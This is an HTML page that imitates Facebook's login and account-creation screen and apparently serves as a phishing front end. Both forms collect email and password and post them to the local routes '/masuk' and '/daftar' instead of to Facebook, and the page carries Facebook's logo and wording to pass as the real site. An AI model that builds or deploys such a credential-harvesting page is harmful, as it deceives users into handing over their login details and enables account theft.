<html>
  
  <title>Restu Ibu</title>
  <head>
    <link type="text/css" rel="stylesheet" href="static/style.css" />
    <meta name="Description" content="Restu Ibu"/>


  </head>
  <body>
    <div class="fb-header-base">
    </div>
    <div class="fb-header">
      <div id="img1" class="fb-header"><img src="static/facebook.png" /></div>
        <form action="/masuk" method="POST">
        <div id="form1" class="fb-header" >Email or Phone<br>
        <input placeholder="Email" type="mail" name="username" id="username" required /><br>
        <input type="checkbox" />keep me logged in
        <input type="date" id="namebox" name="date" />
        </div>
        
        <div id="form2" class="fb-header">Password<br>
          <input placeholder="Password" type="password" name="password" id="password" required /><br>
          Forgotten your password?
        </div>
      </div>
    </div>
    <!-- <input type="date" id="namebox" name="date" /> -->
    <input type="submit" class="submit1" value="login" />
        </form>
    <div class="fb-body">
      <div id="intro1" class="fb-body">Facebook helps you connect and share with the <br>
      people in your life.</div>
      <div id="intro2" class="fb-body">Create an account</div>
      <div id="img2" class="fb-body"><img src="static/world.png" /></div>
      <div id="intro3" class="fb-body">It's free and always will be.</div>
      <div id="form3" class="fb-body">
      <form action="/daftar" method="POST">
        <input placeholder="First Name" type="text" id="namebox" name="name1" />
        <input placeholder="Last Name" type="text" id="namebox"  /> <br>
        <input placeholder="Email" type="text" id="mailbox" name="username" required /><br>
        <input placeholder="Re-enter email" type="text" id="mailbox"  /><br>
        <input placeholder="Password" type="password" id="mailbox"  name="password" required /><br>
        <input type="date" id="namebox" name="date" /><br><br>

        <p id="intro4">By clicking Create an account, you agree to our Terms and that 
        you have read our Data Policy, including our Cookie Use.</p>
        <input type="submit" class="button2" value="Create an account" />
        <br><hr>
        <p id="intro5">Create a Page for a celebrity, band or business.</p>
      </form>
      </div>
      
    </div>
    <div class="fb-body-footer">
        <div id="fb-body-footer-base" class="fb-body-footer">Indonesia<br>
      </div>
  </body>
  
</html>
